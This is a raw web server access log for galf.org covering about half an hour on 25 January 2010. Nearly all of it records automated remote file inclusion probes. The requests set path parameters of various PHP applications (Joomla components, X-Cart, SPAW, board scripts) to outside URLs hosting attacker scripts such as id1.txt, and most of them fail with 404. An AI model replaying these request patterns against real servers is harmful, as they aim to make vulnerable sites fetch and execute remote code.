65.98.80.2 - - [25/Jan/2010:07:29:04 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.galf.org"
65.98.80.2 - - [25/Jan/2010:07:29:04 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.galf.org"
65.98.80.2 - - [25/Jan/2010:07:29:05 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.galf.org"
65.98.80.2 - - [25/Jan/2010:07:29:05 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.galf.org"
203.115.131.17 - - [25/Jan/2010:07:30:59 -0800] "GET /logs/access.log/write_update.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [25/Jan/2010:07:32:48 -0800] "GET /logs/access.log//delete_all.php?board_skin_path=http://www.koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [25/Jan/2010:07:32:48 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [25/Jan/2010:07:32:48 -0800] "GET /delete_all.php?board_skin_path=http://www.koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
189.108.236.148 - - [25/Jan/2010:07:33:09 -0800] "GET /logs/phphtml.php?htmlclass_path=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.55.181 - - [25/Jan/2010:07:33:56 -0800] "GET /logs/access_100104.log/php?pluginpath[0]=' HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
218.38.55.181 - - [25/Jan/2010:07:33:57 -0800] "GET /php?pluginpath[0]=' HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
218.38.55.181 - - [25/Jan/2010:07:33:58 -0800] "GET /logs/php?pluginpath[0]=' HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
70.85.112.138 - - [25/Jan/2010:07:34:05 -0800] "GET /logs/access_091214.log%20//admin/includes/spaw/spaw_control.class.php?spaw_root=http://ppslaterent.com/brd/gid.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
70.85.112.138 - - [25/Jan/2010:07:34:09 -0800] "GET /admin/includes/spaw/spaw_control.class.php?spaw_root=http://ppslaterent.com/brd/gid.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
70.85.112.138 - - [25/Jan/2010:07:34:11 -0800] "GET /logs//admin/includes/spaw/spaw_control.class.php?spaw_root=http://ppslaterent.com/brd/gid.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
219.93.36.90 - - [25/Jan/2010:07:35:08 -0800] "GET /logs/access_090720.log/?sourcedir=http://daiyangmetal.co.kr/intranet/zb/skin/ggambo5100_gallery//COM/m1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [25/Jan/2010:07:35:27 -0800] "GET /delete_all.php?board_skin_path=http://www.koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [25/Jan/2010:07:35:27 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [25/Jan/2010:07:35:27 -0800] "GET /logs/access.log//delete_all.php?board_skin_path=http://www.koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.236.43.200 - - [25/Jan/2010:07:38:04 -0800] "GET /ams/amboard//?_SERVER[DOCUMENT_ROOT]=http://nktech.kr/bbs/data/id2.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
211.236.43.200 - - [25/Jan/2010:07:38:04 -0800] "GET /logs/ams/amboard//?_SERVER[DOCUMENT_ROOT]=http://nktech.kr/bbs/data/id2.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
211.236.43.200 - - [25/Jan/2010:07:38:05 -0800] "GET /logs/access.log/ams/amboard//?_SERVER[DOCUMENT_ROOT]=http://nktech.kr/bbs/data/id2.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
189.108.236.148 - - [25/Jan/2010:07:39:47 -0800] "GET /logs/access.log/phphtml.php?htmlclass_path=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.85.112.138 - - [25/Jan/2010:07:41:17 -0800] "GET /logs/access.log//admin/includes/spaw/spaw_control.class.php?spaw_root=http://ppslaterent.com/brd/gid.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
70.85.112.138 - - [25/Jan/2010:07:41:20 -0800] "GET /admin/includes/spaw/spaw_control.class.php?spaw_root=http://ppslaterent.com/brd/gid.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
70.85.112.138 - - [25/Jan/2010:07:41:20 -0800] "GET /logs//admin/includes/spaw/spaw_control.class.php?spaw_root=http://ppslaterent.com/brd/gid.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
219.93.36.90 - - [25/Jan/2010:07:41:35 -0800] "GET /logs/access.log/?sourcedir=http://daiyangmetal.co.kr/intranet/zb/skin/ggambo5100_gallery//COM/m1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.7.173.20 - - [25/Jan/2010:07:43:35 -0800] "GET /main.php?x=http://epvs.ru/project_files/11_78.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.7.173.20 - - [25/Jan/2010:07:43:35 -0800] "GET /logs/access_090921.log%20%20/main.php?x=http://epvs.ru/project_files/11_78.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.7.173.20 - - [25/Jan/2010:07:43:35 -0800] "GET /logs/main.php?x=http://epvs.ru/project_files/11_78.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.146.168 - - [25/Jan/2010:07:50:49 -0800] "GET /logs/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.146.168 - - [25/Jan/2010:07:50:49 -0800] "GET /logs/access_091207.log%20%20/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.146.168 - - [25/Jan/2010:07:50:49 -0800] "GET /errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [25/Jan/2010:07:50:59 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.237.238.234 - - [25/Jan/2010:07:50:59 -0800] "GET //?sourcedir=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
67.210.98.170 - - [25/Jan/2010:07:50:59 -0800] "GET /logs/access_090727.log//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [25/Jan/2010:07:50:59 -0800] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [25/Jan/2010:07:51:00 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [25/Jan/2010:07:51:00 -0800] "GET /logs/access_090727.log//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [25/Jan/2010:07:51:00 -0800] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.237.238.234 - - [25/Jan/2010:07:51:02 -0800] "GET //?sourcedir=http://210.205.6.168/~shop/id1.txt??? HTTP/1.0" 200 1032 "-" "Mozilla/5.0" "galf.org"
203.237.238.234 - - [25/Jan/2010:07:51:06 -0800] "GET /logs/access.log%20%20///?sourcedir=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.237.238.234 - - [25/Jan/2010:07:51:06 -0800] "GET /logs///?sourcedir=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "galf.org"
203.237.238.234 - - [25/Jan/2010:07:51:07 -0800] "GET /logs/access.log%20%20///?sourcedir=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.237.238.234 - - [25/Jan/2010:07:51:07 -0800] "GET /logs///?sourcedir=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "galf.org"
67.210.98.170 - - [25/Jan/2010:07:51:22 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [25/Jan/2010:07:51:22 -0800] "GET /logs/access_090727.log%20%20//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [25/Jan/2010:07:51:22 -0800] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.146.168 - - [25/Jan/2010:07:51:33 -0800] "GET /logs/access_091207.log%20%20/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.146.168 - - [25/Jan/2010:07:51:33 -0800] "GET /errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.146.168 - - [25/Jan/2010:07:51:33 -0800] "GET /logs/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.146.168 - - [25/Jan/2010:07:51:38 -0800] "GET /logs/access_091130.log%20%20/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.181.7.113 - - [25/Jan/2010:07:51:41 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.galf.org"
67.210.98.170 - - [25/Jan/2010:07:51:43 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [25/Jan/2010:07:51:43 -0800] "GET /logs/access_090727.log%20%20//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [25/Jan/2010:07:51:43 -0800] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.146.168 - - [25/Jan/2010:07:52:13 -0800] "GET /logs/access_091130.log%20%20/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.63.235.157 - - [25/Jan/2010:07:52:43 -0800] "GET /logs//admin/auth.php?xcart_dir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
194.63.235.157 - - [25/Jan/2010:07:52:43 -0800] "GET /admin/auth.php?xcart_dir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
194.63.235.157 - - [25/Jan/2010:07:52:43 -0800] "GET /admin/auth.php?xcart_dir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
194.63.235.157 - - [25/Jan/2010:07:52:43 -0800] "GET /logs//admin/auth.php?xcart_dir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
194.63.235.157 - - [25/Jan/2010:07:52:43 -0800] "GET /logs/access.log%20%20//admin/auth.php?xcart_dir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
194.63.235.157 - - [25/Jan/2010:07:52:43 -0800] "GET /logs/access.log%20%20//admin/auth.php?xcart_dir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
194.63.235.157 - - [25/Jan/2010:07:54:38 -0800] "GET /admin/auth.php?xcart_dir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.63.235.157 - - [25/Jan/2010:07:54:38 -0800] "GET /logs//admin/auth.php?xcart_dir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.63.235.157 - - [25/Jan/2010:07:54:38 -0800] "GET /logs/access_100111.log%20%20//admin/auth.php?xcart_dir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.63.235.157 - - [25/Jan/2010:07:54:40 -0800] "GET /logs//admin/auth.php?xcart_dir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.63.235.157 - - [25/Jan/2010:07:54:40 -0800] "GET /logs/access_100111.log%20%20//admin/auth.php?xcart_dir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.63.235.157 - - [25/Jan/2010:07:54:40 -0800] "GET /admin/auth.php?xcart_dir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [25/Jan/2010:07:55:02 -0800] "GET /index.php?option=com_mosmedia&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [25/Jan/2010:07:55:02 -0800] "GET /logs/access_091123.log//index.php?option=com_mosmedia&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [25/Jan/2010:07:55:02 -0800] "GET /logs//index.php?option=com_mosmedia&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [25/Jan/2010:07:55:11 -0800] "GET /logs//index.php?option=com_mosmedia&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [25/Jan/2010:07:55:11 -0800] "GET /logs/access_091123.log//index.php?option=com_mosmedia&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [25/Jan/2010:07:55:11 -0800] "GET /index.php?option=com_mosmedia&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [25/Jan/2010:07:55:13 -0800] "GET /index.php?option=com_mosmedia&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [25/Jan/2010:07:55:22 -0800] "GET /logs/access_091123.log//index.php?option=com_mosmedia&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [25/Jan/2010:07:55:22 -0800] "GET /logs//index.php?option=com_mosmedia&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [25/Jan/2010:07:55:22 -0800] "GET /index.php?option=com_mosmedia&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [25/Jan/2010:07:55:28 -0800] "GET /index.php?option=com_mosmedia&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [25/Jan/2010:07:55:28 -0800] "GET /logs/access_091123.log//index.php?option=com_mosmedia&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [25/Jan/2010:07:55:29 -0800] "GET /logs//index.php?option=com_mosmedia&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [25/Jan/2010:07:55:31 -0800] "GET /logs/access_090824.log//index.php?option=com_mosmedia&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [25/Jan/2010:07:55:39 -0800] "GET /logs/access_090720.log//index.php?option=com_mosmedia&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [25/Jan/2010:07:55:39 -0800] "GET /logs//index.php?option=com_mosmedia&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [25/Jan/2010:07:55:39 -0800] "GET /index.php?option=com_mosmedia&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [25/Jan/2010:07:55:40 -0800] "GET /logs/access_090720.log//index.php?option=com_mosmedia&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [25/Jan/2010:07:55:40 -0800] "GET /index.php?option=com_mosmedia&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [25/Jan/2010:07:55:40 -0800] "GET /logs//index.php?option=com_mosmedia&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [25/Jan/2010:07:55:42 -0800] "GET /logs/access_090824.log//index.php?option=com_mosmedia&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [25/Jan/2010:07:55:48 -0800] "GET /logs/access_090720.log//index.php?option=com_mosmedia&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [25/Jan/2010:07:55:48 -0800] "GET /logs//index.php?option=com_mosmedia&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [25/Jan/2010:07:55:49 -0800] "GET /logs/access_090824.log//index.php?option=com_mosmedia&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [25/Jan/2010:07:55:54 -0800] "GET /logs/access_090824.log//index.php?option=com_mosmedia&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.141.18.221 - - [25/Jan/2010:07:55:56 -0800] "GET /index.php?option=com_mosmedia&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.141.18.221 - - [25/Jan/2010:07:55:56 -0800] "GET /logs/access_090810.log//index.php?option=com_mosmedia&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.141.18.221 - - [25/Jan/2010:07:56:00 -0800] "GET /logs//index.php?option=com_mosmedia&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.120.227.139 - - [25/Jan/2010:07:57:41 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.sinhan.net/zeroboard41/data/board/1097820351//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.120.227.139 - - [25/Jan/2010:07:57:41 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.sinhan.net/zeroboard41/data/board/1097820351//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.120.227.139 - - [25/Jan/2010:07:57:42 -0800] "GET /logs/access_090720.log//newspublish/include.php?path%5Bdocroot%5D=http://www.sinhan.net/zeroboard41/data/board/1097820351//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.141.18.221 - - [25/Jan/2010:07:57:53 -0800] "GET /index.php?option=com_mosmedia&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.141.18.221 - - [25/Jan/2010:07:57:53 -0800] "GET /logs//index.php?option=com_mosmedia&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.125.126.97 - - [25/Jan/2010:07:57:54 -0800] "GET /logs/errors.php?error=http://www.pymexpo.org/skins/com/tool/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.125.126.97 - - [25/Jan/2010:07:57:54 -0800] "GET /logs/access.log%20%20/errors.php?error=http://www.pymexpo.org/skins/com/tool/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.141.18.221 - - [25/Jan/2010:07:57:54 -0800] "GET /logs/access_090720.log//index.php?option=com_mosmedia&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.125.126.97 - - [25/Jan/2010:07:57:54 -0800] "GET /errors.php?error=http://www.pymexpo.org/skins/com/tool/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.63.235.157 - - [25/Jan/2010:07:57:56 -0800] "GET /logs/access.log//admin/auth.php?xcart_dir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
194.63.235.157 - - [25/Jan/2010:07:58:00 -0800] "GET /logs/access.log//admin/auth.php?xcart_dir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
83.141.18.221 - - [25/Jan/2010:07:58:08 -0800] "GET /index.php?option=com_mosmedia&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.141.18.221 - - [25/Jan/2010:07:58:08 -0800] "GET /logs//index.php?option=com_mosmedia&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.141.18.221 - - [25/Jan/2010:07:58:11 -0800] "GET /logs/access_090720.log//index.php?option=com_mosmedia&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.141.18.221 - - [25/Jan/2010:07:58:23 -0800] "GET /index.php?option=com_mosmedia&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.141.18.221 - - [25/Jan/2010:07:58:33 -0800] "GET /logs//index.php?option=com_mosmedia&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.141.18.221 - - [25/Jan/2010:07:58:33 -0800] "GET /logs/access_091123.log//index.php?option=com_mosmedia&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.141.18.221 - - [25/Jan/2010:07:58:34 -0800] "GET /index.php?option=com_mosmedia&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.141.18.221 - - [25/Jan/2010:07:58:57 -0800] "GET /logs/access_090720.log//index.php?option=com_mosmedia&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.158.155 - - [25/Jan/2010:07:59:34 -0800] "GET /logs/errors.php?error=http://partner.waawaa.com//renewal/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.158.155 - - [25/Jan/2010:07:59:34 -0800] "GET /errors.php?error=http://partner.waawaa.com//renewal/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.158.155 - - [25/Jan/2010:07:59:34 -0800] "GET /logs/access.log/errors.php?error=http://partner.waawaa.com//renewal/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.63.235.157 - - [25/Jan/2010:08:00:43 -0800] "GET /logs/access_090720.log//admin/auth.php?xcart_dir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.63.235.157 - - [25/Jan/2010:08:00:48 -0800] "GET /logs/access_090720.log//admin/auth.php?xcart_dir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.63.235.157 - - [25/Jan/2010:08:01:18 -0800] "GET /logs/access_091102.log//admin/auth.php?xcart_dir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [25/Jan/2010:08:02:03 -0800] "GET /logs/access.log%20%20//board/bbs/delete_all.php//logs/access.log//write_update.php?board_skin_path=http://jil.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [25/Jan/2010:08:02:03 -0800] "GET /logs//board/bbs/delete_all.php//logs/access.log//write_update.php?board_skin_path=http://jil.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
